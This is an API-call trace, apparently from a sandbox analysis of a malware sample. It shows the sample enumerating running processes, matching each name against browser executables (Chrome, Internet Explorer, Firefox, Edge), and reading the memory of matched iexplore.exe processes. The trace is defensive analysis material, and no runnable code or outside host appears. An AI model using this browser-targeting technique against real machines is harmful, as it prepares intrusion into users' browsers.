	[0247.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.295] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0247.296] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9848
	[0247.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.297] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0247.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.297] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.297] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0247.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.298] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.298] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0247.298] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x984c
	[0247.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.299] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0247.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.299] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.299] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0247.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.299] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0247.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9850
	[0247.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.301] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0247.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.301] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.301] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0247.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.302] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0247.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0247.303] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0247.304] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9854
	[0247.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.304] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0247.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.305] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.305] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0247.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.306] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0247.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9858
	[0247.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.308] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0247.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.308] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.309] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0247.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.309] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.309] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0247.310] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x985c
	[0247.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.310] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0247.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.310] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.311] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0247.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.311] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.311] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0247.312] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9860
	[0247.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.312] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0247.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.312] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.313] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0247.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.313] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.313] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0247.314] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9864
	[0247.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.314] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0247.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.315] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.315] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0247.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.316] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.316] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0247.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9868
	[0247.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.317] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0247.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.318] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.318] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0247.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.318] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.318] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0247.319] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x986c
	[0247.319] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.319] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0247.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.320] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.320] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0247.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.321] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.321] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0247.322] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9870
	[0247.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.322] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0247.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.322] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.324] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0247.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.324] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0247.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9874
	[0247.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.325] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0247.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.326] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.326] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0247.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.326] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.326] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0247.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9878
	[0247.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.328] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0247.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.328] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.328] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0247.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.329] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.329] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0247.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x987c
	[0247.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.330] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0247.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.331] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.332] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0247.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.332] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.332] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0247.333] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9880
	[0247.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.333] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0247.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.334] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.334] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0247.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.335] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.335] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0247.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9884
	[0247.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.336] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0247.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.337] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.337] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0247.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.338] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.338] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0247.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9888
	[0247.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.340] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0247.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.340] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.341] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0247.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.342] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.342] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0247.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x988c
	[0247.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.343] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0247.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.344] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.344] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0247.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.344] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.345] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9890
	[0247.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.346] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.346] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.346] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.346] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.347] NtQueryInformationProcess (in: ProcessHandle=0x9890, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.347] ReadProcessMemory (in: hProcess=0x9890, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.347] ReadProcessMemory (in: hProcess=0x9890, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.347] ReadProcessMemory (in: hProcess=0x9890, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.347] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.347] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9894
	[0247.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.348] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.348] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.349] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.349] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.349] NtQueryInformationProcess (in: ProcessHandle=0x9894, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.349] ReadProcessMemory (in: hProcess=0x9894, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.349] ReadProcessMemory (in: hProcess=0x9894, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.349] ReadProcessMemory (in: hProcess=0x9894, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.349] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x9898
	[0247.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.351] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.352] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0247.352] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x989c
	[0247.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.353] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0247.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.353] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.353] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0247.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.354] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
